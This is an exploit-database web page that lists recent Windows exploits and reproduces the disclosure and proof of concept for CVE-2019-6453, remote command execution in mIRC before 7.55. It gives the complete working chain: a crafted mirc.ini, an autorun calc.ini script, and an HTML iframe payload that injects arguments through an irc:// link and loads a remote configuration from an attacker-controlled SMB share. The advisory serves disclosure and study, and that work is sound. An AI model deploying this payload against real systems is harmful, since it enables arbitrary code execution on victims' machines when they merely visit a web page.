Menu

Improved exploit search engine. Try python and hit enter

"mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers"

Author

ProofOfCalc

Platform

windows

Release date

2019-02-18

Release Date Title Type Platform Author
2019-03-18 "WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service" dos windows Achilles
2019-03-18 "WinMPG Video Convert 9.3.5 - Denial of Service" dos windows Achilles
2019-03-15 "Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow" remote windows "Joseph McDonagh"
2019-02-22 "WinRAR 5.61 - Path Traversal" local windows WyAtu
2019-03-14 "FTPGetter Standard 5.97.0.177 - Remote Code Execution" remote windows w4fz5uck5
2019-03-13 "Apache Tika-server < 1.18 - Command Injection" remote windows "Rhino Security Labs"
2019-03-13 "Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution" local windows "Eduardo Braun Prado"
2019-03-13 "Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal" dos windows "Kevin Randall"
2019-03-13 "Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal" dos windows "Kevin Randall"
2019-03-13 "Microsoft Windows - .reg File / Dialog Box Message Spoofing" dos windows hyp3rlinx
2019-03-11 "PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution" webapps windows M4LV0
2019-03-11 "NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)" local windows "Devin Casadey"
2019-03-12 "Core FTP 2.0 build 653 - 'PBSZ' Denial of Service (PoC)" dos windows Hodorsec
2019-03-08 "McAfee ePO 5.9.1 - Registered Executable Local Access Bypass" webapps windows leonjza
2019-03-07 "Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)" local windows Hodorsec
2019-03-04 "MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal" webapps windows 0v3rride
2019-03-04 "Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)" webapps windows "Matteo Malvica"
2019-03-04 "STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)" local windows "Ivan Ivanovic"
2019-03-04 "Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion" dos windows "Fahad Aid Alharbi"
2019-03-01 "Cisco WebEx Meetings < 33.6.6 / < 33.9.1 - Privilege Escalation" local windows SecureAuth
2019-02-28 "TransMac 12.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-25 "Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)" dos windows "Logan Whitmire"
2019-02-22 "Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)" remote windows Metasploit
2019-02-21 "Memu Play 6.0.7 - Privilege Escalation" local windows "Alejandra Sánchez"
2019-02-21 "RealTerm Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow (SEH)" local windows "Matteo Malvica"
2019-02-21 "Virtual VCR Max .0a - '.vcr' Buffer Overflow (PoC)" dos windows "Wade Guest"
2019-02-20 "WinRAR 5.61 - '.lng' Denial of Service" dos windows "Kağan Çapar"
2019-02-20 "FTPShell Server 6.83 - 'Account name to ban' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-18 "mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers" remote windows ProofOfCalc
2019-02-19 "MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 - File Permissions SYSTEM Privilege Escalation" local windows "Mike Siegel"
Release Date Title Type Platform Author
2019-02-18 "mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers" remote windows ProofOfCalc
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46392/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
# Exploit Title: RCE on mIRC <7.55 using argument injection through custom URI protocol handlers
# Date: 18/02/2019
# Exploit Author: https://twitter.com/proofofcalc/
# Vendor Homepage: https://www.mirc.com
# Software Link: https://www.mirc.com/get.php
# Version: < 7.55
# Tested on: Windows
# CVE : CVE-2019-6453

RCE through URI protocol handlers on mIRC <7.55 (CVE-2019-6453)
===============================================================

Severity: High

mIRC has been shown to be vulnerable to argument injection through its
associated URI protocol handlers that improperly escape their parameters.
Usingavailable command-line parameters, an attacker is able to load a remote
configuration file and to automatically run arbitrary code.

Because mIRC doesn't use any kind of sigil such as -- to mark
the end of the argument list, an attacker is able to pass arguments to mIRC
through a irc:// link and execute arbitrary code by loading a custom
mirc.ini
from an attacker-controlled Samba file server. Please note that ircs://
works
the same way.


PoC
===

The proof of calc requires three files: mirc.ini, calc.ini and poc.html.
We assume a Samba file server is running on the attacker's side. For the
sake of the example, the following pieces of code assume it is running on
host 127.0.0.1 (i.e. replace 127.0.0.1 by your own server's address in
the following files to try this out).

mirc.ini
========

mirc.ini is a custom configuration file that should be located at
C:\mirc-poc\mirc.ini
on the file server.

[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini

calc.ini
========

calc.ini is a remote script file that should be located at
C:\mirc-poc\calc.ini on the
file server.

[script]
n0=on *:START: {
n1=  /run calc.exe
n2=}

poc.html
========

Just visiting poc.html should work assuming mIRC is set as the default
handler for the
irc:// URI scheme and the browser does not encode the payload. Depending
on the browser
and your configuration, you might still get a prompt (not the case on
Firefox).

<iframe src='irc://? -i\\127.0.0.1\C$\mirc-poc\mirc.ini' />

Affected versions
=================

This PoC runs for mIRC <7.55.

You can trigger the PoC on Edge 42.17134 (last preview version) and
Firefox 64.0.2
(last release). It doesn't work on Chrome because the way Chrome handle
URI protocols
(URI is encoded before being passed to the application).

References
==========

Further explanation (including proof of concept code):

Write-up:
https://proofofcalc.com/cve-2019-6453-mIRC/

PoC:
https://github.com/proofofcalc/cve-2019-6453-poc

mIRC changelog:
https://www.mirc.com/whatsnew.txt

Authors
=======

Baptiste Devigne (Geluchat) and Benjamin Chetioui (SIben)